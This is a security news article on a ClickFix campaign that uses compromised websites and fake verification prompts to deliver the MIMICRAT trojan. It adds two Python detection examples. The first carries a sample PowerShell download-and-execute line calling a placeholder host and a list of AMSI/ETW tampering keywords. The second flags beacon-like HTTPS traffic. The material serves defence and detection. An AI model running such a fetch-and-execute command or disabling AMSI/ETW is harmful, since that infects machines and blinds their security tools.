Security researchers have uncovered a sophisticated ClickFix campaign that hijacks legitimate websites to infect users with a novel remote access trojan known as MIMICRAT. By tricking visitors into running malicious PowerShell commands under the guise of fake browser verification prompts, attackers gain deep system access for potential data theft or ransomware deployment.
Security experts at Elastic Security Labs recently identified an advanced cyberattack strategy that leverages compromised legitimate websites across various industries to distribute a previously unknown malware named MIMICRAT. This campaign utilizes a social engineering technique called ClickFix, which presents users with fraudulent error messages or verification pages, such as fake Cloudflare prompts. These lures deceive victims into copying and pasting malicious PowerShell scripts directly into their Windows Run dialog boxes to supposedly resolve a technical issue.
The technical execution of this campaign reveals a high degree of complexity, starting with the injection of malicious JavaScript into trusted platforms such as a bank identification number (BIN) validation service. Once a victim executes the initial command, a multi-stage infection process begins. A secondary PowerShell script is retrieved from a remote server, specifically designed to disable Windows security features such as Event Tracing for Windows (ETW) and the Antimalware Scan Interface (AMSI). This ensures the subsequent stages of the attack can proceed without being detected by standard antivirus software.
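The infection chain above leaves a recognisable footprint in endpoint telemetry: PowerShell launched under explorer.exe (the parent of anything typed into the Run dialog), a download cradle on the command line, and a script block that references AMSI or ETW internals. The following Python is an added detection example written for this page, not code from Elastic Security Labs or from the campaign; the JSON event records are constructed samples with an assumed field layout (event, parent, image, cmdline, script), not a particular vendor's schema, and the tamper keywords are the indicator strings defenders commonly alert on rather than any bypass logic.

```python
import json
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry (JSON lines), not real logs: a ClickFix-style
# launch from the Run dialog, a benign script started from cmd.exe, a script
# block carrying AMSI/ETW tampering indicators, and a benign script block.
# Field names are assumptions for this example, not a vendor schema.
SAMPLE_EVENTS = [
    json.dumps({
        "event": "process_create",
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": 'powershell -w hidden -c "iwr https://verify.example.invalid/check | iex"',
    }),
    json.dumps({
        "event": "process_create",
        "parent": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell -File C:\scripts\backup.ps1",
    }),
    json.dumps({
        "event": "script_block",
        # constructed indicator-only text; it does nothing when run
        "script": 'Write-Host "stage2"; $flags = @("amsiInitFailed", "EtwEventWrite")',
    }),
    json.dumps({
        "event": "script_block",
        "script": r"Get-ChildItem C:\logs | Where-Object Length -gt 1MB",
    }),
]

# Download-and-execute cradle: a fetch verb followed later by iex/Invoke-Expression.
DOWNLOAD_CRADLE = re.compile(
    r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b.*\b(iex|invoke-expression)\b",
    re.IGNORECASE | re.DOTALL,
)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE)
ENCODED_COMMAND = re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)
# Strings that appear when a script tries to disable AMSI or ETW; these are
# detection keywords of the kind used in public Sigma-style rules.
TAMPER_TOKENS = ("amsiinitfailed", "amsiscanbuffer", "amsiutils", "etweventwrite")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: Dict) -> List[str]:
    """Flag PowerShell launches that match the ClickFix Run-dialog pattern."""
    reasons: List[str] = []
    if _basename(ev.get("image", "")) not in ("powershell.exe", "pwsh.exe"):
        return reasons
    cmd = ev.get("cmdline", "")
    # Commands typed into Win+R are spawned by explorer.exe.
    if _basename(ev.get("parent", "")) == "explorer.exe":
        reasons.append("powershell-from-explorer")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download-cradle")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden-window")
    if ENCODED_COMMAND.search(cmd):
        reasons.append("encoded-command")
    # An explorer parent alone is normal (user opened a console); require a
    # second indicator before raising it.
    if reasons == ["powershell-from-explorer"]:
        return []
    return reasons


def check_script_block(ev: Dict) -> List[str]:
    """Flag script blocks that reference AMSI/ETW tampering internals."""
    text = ev.get("script", "").lower()
    hits = [t for t in TAMPER_TOKENS if t in text]
    return ["security-tamper:" + ",".join(hits)] if hits else []


def analyze_events(lines) -> List[Tuple[int, List[str]]]:
    """Run both checks over JSON-line events; return (index, reasons) per hit."""
    findings: List[Tuple[int, List[str]]] = []
    for i, line in enumerate(lines):
        ev = json.loads(line)
        if ev.get("event") == "process_create":
            reasons = check_process(ev)
        elif ev.get("event") == "script_block":
            reasons = check_script_block(ev)
        else:
            reasons = []
        if reasons:
            findings.append((i, reasons))
    return findings


if __name__ == "__main__":
    for idx, why in analyze_events(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(why)}")
```

Requiring two indicators before alerting on the explorer.exe parent keeps the rule quiet on ordinary interactive use; in production the same logic would read Sysmon Event ID 1 and PowerShell script-block (4104) records rather than the constructed list, and the process check should also cover a parent chain where explorer.exe launches cmd.exe first.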
Following the bypass of system defenses, the attack deploys a specialized loader scripted in Lua. This loader is responsible for decrypting and executing shellcode within the system memory, which finally installs the MIMICRAT implant. MIMICRAT itself is a powerful remote access tool written in C++ that provides attackers with extensive control over the compromised machine. It includes capabilities for token impersonation, file system manipulation, and establishing encrypted tunnels to bypass network security.
To maintain a low profile, the malware communicates with its command-and-control infrastructure using standard HTTPS traffic on port 443. It employs specific data profiles that mimic legitimate web analytics, making the malicious data transfers blend in with normal internet activity. The developers of this campaign have also localized their lures into 17 different languages, allowing the attack to automatically adapt to the victim's browser settings and broaden its global reach across different regions and languages.
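Because the C2 traffic described above rides on port 443 with URIs shaped like web analytics, filtering on destination or path gives little; what an implant cannot easily hide is its cadence. The Python below is an added example of a simple beacon-regularity check over an outbound proxy log. It is not code from the report or from any vendor; the log lines are constructed, the field order (time, client, host, port, URI) is an assumption for this example, and the thresholds are illustrative starting points.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timezone
from typing import Dict, List, Tuple

# Constructed outbound-proxy log (not real traffic), one request per line:
# "<ISO time> <client> <dest host> <port> <uri>". Host 10.0.0.5 hits an
# analytics-looking endpoint about once a minute, fetches a CDN in bursts,
# and browses a website a few times. Only the first pattern is a beacon.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z 10.0.0.5 metrics.example.invalid 443 /collect?v=1&t=pageview
2024-05-01T10:00:05Z 10.0.0.5 cdn.example.invalid 443 /lib/app.js
2024-05-01T10:00:06Z 10.0.0.5 cdn.example.invalid 443 /lib/style.css
2024-05-01T10:00:12Z 10.0.0.5 www.example.invalid 443 /
2024-05-01T10:00:30Z 10.0.0.5 cdn.example.invalid 443 /img/logo.png
2024-05-01T10:01:02Z 10.0.0.5 metrics.example.invalid 443 /collect?v=1&t=pageview
2024-05-01T10:01:59Z 10.0.0.5 metrics.example.invalid 443 /collect?v=1&t=event
2024-05-01T10:02:10Z 10.0.0.5 cdn.example.invalid 443 /img/hero.jpg
2024-05-01T10:03:01Z 10.0.0.5 metrics.example.invalid 443 /collect?v=1&t=pageview
2024-05-01T10:03:47Z 10.0.0.5 www.example.invalid 443 /news
2024-05-01T10:04:00Z 10.0.0.5 metrics.example.invalid 443 /collect?v=1&t=pageview
2024-05-01T10:05:03Z 10.0.0.5 metrics.example.invalid 443 /collect?v=1&t=event
2024-05-01T10:05:58Z 10.0.0.5 metrics.example.invalid 443 /collect?v=1&t=pageview
2024-05-01T10:07:00Z 10.0.0.5 metrics.example.invalid 443 /collect?v=1&t=pageview
2024-05-01T10:09:00Z 10.0.0.5 cdn.example.invalid 443 /lib/app.js
2024-05-01T10:09:01Z 10.0.0.5 cdn.example.invalid 443 /lib/style.css
2024-05-01T10:15:40Z 10.0.0.5 cdn.example.invalid 443 /img/logo.png
2024-05-01T10:20:02Z 10.0.0.5 www.example.invalid 443 /about
"""

MIN_INTERVALS = 5     # enough gaps before calling anything periodic
MAX_JITTER_CV = 0.2   # stdev/mean of the gaps; lightly jittered beacons stay well under this


def parse_log(text: str) -> List[Tuple[datetime, str, str, int, str]]:
    """Parse the assumed five-field log format into typed rows."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, host, port, uri = line.split(maxsplit=4)
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        rows.append((when, client, host, int(port), uri))
    return rows


def find_beacons(text: str) -> Dict[Tuple[str, str], Dict[str, float]]:
    """Return (client, host) pairs whose request cadence is suspiciously regular."""
    by_pair: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for when, client, host, port, _uri in parse_log(text):
        # Plain HTTPS only; the URI is deliberately analytics-like, so it is ignored.
        if port == 443:
            by_pair[(client, host)].append(when)
    flagged: Dict[Tuple[str, str], Dict[str, float]] = {}
    for pair, times in by_pair.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if len(gaps) < MIN_INTERVALS:
            continue
        mean = statistics.mean(gaps)
        cv = statistics.stdev(gaps) / mean if mean else float("inf")
        if cv < MAX_JITTER_CV:
            flagged[pair] = {"count": len(times), "mean_gap_s": mean, "jitter_cv": round(cv, 3)}
    return flagged


if __name__ == "__main__":
    for (client, host), stats in find_beacons(SAMPLE_LOG).items():
        print(f"{client} -> {host}: {stats}")
```

The CDN traffic has more requests than the beacon but its gaps vary by orders of magnitude, so the coefficient of variation separates the two without any knowledge of the URI; legitimate analytics SDKs do batch on timers as well, so a hit like this is a lead for checking the sending process and the destination's reputation rather than a verdict on its own.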
Early evidence suggests that this operation shares infrastructure and tactics with other known malware campaigns, indicating a coordinated effort by sophisticated threat actors. While the specific primary objective remains under investigation, researchers believe the ultimate goal is likely the exfiltration of sensitive corporate data or the eventual deployment of ransomware. Victims identified so far range from academic institutions in the United States to various users across Asia, highlighting the broad and opportunistic nature of the threat.
Source: ClickFix Campaign Uses Compromised Sites To Deliver MIMICRAT Malware